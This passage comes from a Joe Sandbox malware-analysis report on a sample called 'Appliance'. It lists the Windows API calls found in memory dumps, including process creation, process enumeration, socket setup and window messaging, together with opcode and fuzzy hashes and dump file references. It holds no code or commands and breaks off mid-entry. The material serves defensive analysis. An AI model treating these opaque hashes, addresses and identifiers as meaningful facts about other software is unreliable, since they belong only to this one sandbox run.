                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                            • String ID: ($(
                                                                                                                                            • API String ID: 3814560230-3881858432
                                                                                                                                            • Opcode ID: 282190ff6b68a5d421e1bb78f412b62e780210b54ad5f25aa26d78b9a619539e
                                                                                                                                            • Instruction ID: 91b4dde90be82c3bb7fdbab6962b5f3c427d55552b9c8cda1217655869253d9f
                                                                                                                                            • Opcode Fuzzy Hash: 282190ff6b68a5d421e1bb78f412b62e780210b54ad5f25aa26d78b9a619539e
                                                                                                                                            • Instruction Fuzzy Hash: DE215E74105301DFCB24DF29D850AA6B7F5FB89761F201A1EE975B73A0DB70A809CB60
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E54CED
                                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E54D02
                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E54D0F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend
                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                            • Opcode ID: 689452032d38df9cb82183cdc70f72ac9da9c0759c32f6483a2f7ff9fe9c74fb
                                                                                                                                            • Instruction ID: 99f16eeb8ef41109ab864b8e5c2ea1c350047a0fdd89caf41a127e930f662952
                                                                                                                                            • Opcode Fuzzy Hash: 689452032d38df9cb82183cdc70f72ac9da9c0759c32f6483a2f7ff9fe9c74fb
                                                                                                                                            • Instruction Fuzzy Hash: 4D1123B1240248BEEF205E65CC06FAB77A8EF84B29F111915FE44F20E0C271D8909B20
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A
                                                                                                                                              • Part of subcall function 00E236F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E23712
                                                                                                                                              • Part of subcall function 00E236F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E23723
                                                                                                                                              • Part of subcall function 00E236F4: GetCurrentThreadId.KERNEL32 ref: 00E2372A
                                                                                                                                              • Part of subcall function 00E236F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E23731
                                                                                                                                            • GetFocus.USER32 ref: 00E238C4
                                                                                                                                              • Part of subcall function 00E2373B: GetParent.USER32(00000000), ref: 00E23746
                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00E2390F
                                                                                                                                            • EnumChildWindows.USER32(?,00E23987), ref: 00E23937
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                            • String ID: %s%d
                                                                                                                                            • API String ID: 1272988791-1110647743
                                                                                                                                            • Opcode ID: 5774c05e0c040503547baeddf53325ed579d596c8a1aa9a0207caea4f47c6369
                                                                                                                                            • Instruction ID: 7fc7c2584c0d2c2d7822677709b335afe104b6a43cd63dd4f1dcdb2a91155dcf
                                                                                                                                            • Opcode Fuzzy Hash: 5774c05e0c040503547baeddf53325ed579d596c8a1aa9a0207caea4f47c6369
                                                                                                                                            • Instruction Fuzzy Hash: 361105B17002196BCF11BF709C85EED77A9AF84304F005069B809BB292CEB4494A9F30
                                                                                                                                            APIs
                                                                                                                                            • DeleteObject.GDI32(?), ref: 00DC5A34
                                                                                                                                            • DestroyWindow.USER32(?,00DC37B8,?,?,?,?,?,00DC3709,?,?), ref: 00DC5A91
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteDestroyObjectWindow
                                                                                                                                            • String ID: <)$<)
                                                                                                                                            • API String ID: 2587070983-10615988
                                                                                                                                            • Opcode ID: 704eccc6570ba4c0c21cf64ad8d0527420edbc0632b7ae82cda58a96976a943b
                                                                                                                                            • Instruction ID: 4f9e1bd8622d731e06df69f88a657a4d030e5f00d324262c6ebeec87aeebb7fc
                                                                                                                                            • Opcode Fuzzy Hash: 704eccc6570ba4c0c21cf64ad8d0527420edbc0632b7ae82cda58a96976a943b
                                                                                                                                            • Instruction Fuzzy Hash: 8921E774606A02AFDF189B16E894F2533E4ABD4315F04515FEA02FB2A5CB31AC88CB21
                                                                                                                                            APIs
                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E56360
                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E5638D
                                                                                                                                            • DrawMenuBar.USER32(?), ref: 00E5639C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                                                            • Opcode ID: 1b46c1db1564d9bc34bafcffe152dd7c9943ca60d763865b73420c4b4422b7c6
                                                                                                                                            • Instruction ID: d2b6f97cc3bfd156b9ce729c8652cc80de28185d276daa1bf290ddebf34d88c7
                                                                                                                                            • Opcode Fuzzy Hash: 1b46c1db1564d9bc34bafcffe152dd7c9943ca60d763865b73420c4b4422b7c6
                                                                                                                                            • Instruction Fuzzy Hash: ED016D32504218EFDB21AF12DC84BAE7BB4FB45356F148499E849EA150DB708A89EF31
                                                                                                                                            APIs
                                                                                                                                            • GetForegroundWindow.USER32(?,00E928E0,00E5AD55,000000FC,?,00000000,00000000,?), ref: 00E5823F
                                                                                                                                            • GetFocus.USER32 ref: 00E58247
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                              • Part of subcall function 00DC2234: GetWindowLongW.USER32(?,000000EB), ref: 00DC2242
                                                                                                                                            • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 00E582B4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 3601265619-2063206799
                                                                                                                                            • Opcode ID: 906f05dce0130707c00311f460543c970abc61313d23ed977e59a8fdcd8ae71b
                                                                                                                                            • Instruction ID: 3ea9257e72971aaeb5cc00109d7f217d5fddbd858015e935af99da31ba13ee78
                                                                                                                                            • Opcode Fuzzy Hash: 906f05dce0130707c00311f460543c970abc61313d23ed977e59a8fdcd8ae71b
                                                                                                                                            • Instruction Fuzzy Hash: FF01B535206500DFC729DF29D844A6937EAEBC9326F14055EE912A73B0CB306C0FCB50
                                                                                                                                            APIs
                                                                                                                                            • DestroyAcceleratorTable.USER32(?), ref: 00E58576
                                                                                                                                            • CreateAcceleratorTableW.USER32(00000000,?,?,?,00E3BE96,00000000,00000000,?,00000001,00000002), ref: 00E5858C
                                                                                                                                            • GetForegroundWindow.USER32(?,00E3BE96,00000000,00000000,?,00000001,00000002), ref: 00E58595
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 986409557-2063206799
                                                                                                                                            • Opcode ID: 6cd35d65456bde658ec9c489b68f7c9242b1cd591d8012e15e1ef3342aca94ad
                                                                                                                                            • Instruction ID: 923b8a4b136ab264b7f7b7a1aeb9c496e44c8b811fa36c5b71bf408d9e452b63
                                                                                                                                            • Opcode Fuzzy Hash: 6cd35d65456bde658ec9c489b68f7c9242b1cd591d8012e15e1ef3342aca94ad
                                                                                                                                            • Instruction Fuzzy Hash: B7012130501314DFCF289F56DC84A6577A5FB54316F10591FEA11B72B0E7309998CF80
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E94038,00E9407C), ref: 00E58C1A
                                                                                                                                            • CloseHandle.KERNEL32 ref: 00E58C2C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                            • String ID: 8@$|@
                                                                                                                                            • API String ID: 3712363035-2203533388
                                                                                                                                            • Opcode ID: af52abccfed198e55bca6ec2895c1a1900eb1baef52f9672efd4d2d1f0b555a9
                                                                                                                                            • Instruction ID: 28d036fe18de3d6114b0ffafa55f4bc53862c34371b41581f53cd28568dc460c
                                                                                                                                            • Opcode Fuzzy Hash: af52abccfed198e55bca6ec2895c1a1900eb1baef52f9672efd4d2d1f0b555a9
                                                                                                                                            • Instruction Fuzzy Hash: 49F05EF2541304BEE7206B62AC46F773E5CEB14355F000422BF09F61E1D6754C0982BA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 22f04b22824c65f61e95bdea19c0faea270f83ced5eb616bc100d5e0a71dc136
                                                                                                                                            • Instruction ID: bb442671810824d51f6ab3b8e65cfe0ac746e949df6aac42d0cfc4076476a643
                                                                                                                                            • Opcode Fuzzy Hash: 22f04b22824c65f61e95bdea19c0faea270f83ced5eb616bc100d5e0a71dc136
                                                                                                                                            • Instruction Fuzzy Hash: 48C18275A00216EFDB14CF94D894EAEB7B5FF48708F109598E406EB292D771DE81CB90
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                            • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                            • Instruction ID: a20a9d60eeeced40f9617ddc6daca7e7aaf22087d6f5f8d01fdca694e5433ca4
                                                                                                                                            • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                            • Instruction Fuzzy Hash: 3AA1577290038A9FDB25CF18C8917BFBBE4EF55314F1A81ADE795AB281C2789941C770
                                                                                                                                            APIs
                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E60BD4,?), ref: 00E20EE0
                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E60BD4,?), ref: 00E20EF8
                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00E5DCE0,000000FF,?,00000000,00000800,00000000,?,00E60BD4,?), ref: 00E20F1D
                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00E20F3E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 314563124-0
                                                                                                                                            • Opcode ID: 51bb19fa20add18dd992c09f611f72f0120bac7893ebbe235c040c8e48070e60
                                                                                                                                            • Instruction ID: d1fbb8abf1ebc8b4640ce661163ab44eed5223bc425554239beeae459c63c1a9
                                                                                                                                            • Opcode Fuzzy Hash: 51bb19fa20add18dd992c09f611f72f0120bac7893ebbe235c040c8e48070e60
                                                                                                                                            • Instruction Fuzzy Hash: 4A813871A00219EFCB04DF94C984EEEB7B9FF89315F204558E506BB291DB71AE46CB60
                                                                                                                                            APIs
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00E4B10C
                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00E4B11A
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00E4B1FC
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E4B20B
                                                                                                                                              • Part of subcall function 00DDE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00E04D73,?), ref: 00DDE395
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1991900642-0
                                                                                                                                            • Opcode ID: 3bfc0034aa925cd9fa52b76d5905d1e576f1ef0e521d994d2051322934e4d1b1
                                                                                                                                            • Instruction ID: 49204bc677ca96ff9bbdfa904e60190be74af477edf8d9a00678df28099837af
                                                                                                                                            • Opcode Fuzzy Hash: 3bfc0034aa925cd9fa52b76d5905d1e576f1ef0e521d994d2051322934e4d1b1
                                                                                                                                            • Instruction Fuzzy Hash: DE513CB1908301AFD310EF25D886E5BBBE8FF88754F40491DF589A7251EB70D905CBA2
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            • Opcode ID: d51812d43126a06cc6b8b921db9450bb228d5da436b7ece991c1ff4a97b366c6
                                                                                                                                            • Instruction ID: 5b94dbf6a69f734f973c9c93ec42f74573801f83549649aa075fe7d6595e5bed
                                                                                                                                            • Opcode Fuzzy Hash: d51812d43126a06cc6b8b921db9450bb228d5da436b7ece991c1ff4a97b366c6
                                                                                                                                            • Instruction Fuzzy Hash: 9B412D31900144ABDB397BBA9C41BBE36A4EF46730F1886AAF514FF1D1E63549C14671
                                                                                                                                            APIs
                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00E4255A
                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00E42568
                                                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E425E7
                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00E425F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1881357543-0
                                                                                                                                            • Opcode ID: 3b37a629fc9dc6ce94b848499e784f103780cb719cf4c0211f04d99c1c6ed551
                                                                                                                                            • Instruction ID: b82b29780b1578b71e16a769b12df13d33f009ab5e0c20a2e50dcd439b640dcd
                                                                                                                                            • Opcode Fuzzy Hash: 3b37a629fc9dc6ce94b848499e784f103780cb719cf4c0211f04d99c1c6ed551
                                                                                                                                            • Instruction Fuzzy Hash: 8C41B375A00201AFE720AF24D886F2677E5EB44718F94C48CFA599F3D2D772ED418BA1
                                                                                                                                            APIs
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00E56D1A
                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00E56D4D
                                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E56DBA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3880355969-0
                                                                                                                                            • Opcode ID: a8c1a2b14e732be1468b880fa5f6a10113a48859382ea7b17a01bfe6b5121098
                                                                                                                                            • Instruction ID: ceb5eb310345e2f551b2e1d93a263822e1f7a05d0db462579944c4b921c3438f
                                                                                                                                            • Opcode Fuzzy Hash: a8c1a2b14e732be1468b880fa5f6a10113a48859382ea7b17a01bfe6b5121098
                                                                                                                                            • Instruction Fuzzy Hash: 5F516034A01209EFCF24DF64D881AAE7BB6FF44325F50995AFD15A7290DB30AE45CB50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8d0e312e6f7811eecaa61d5633a1486c00bfc9c64631dcc1b497c4f2e1be5c9c
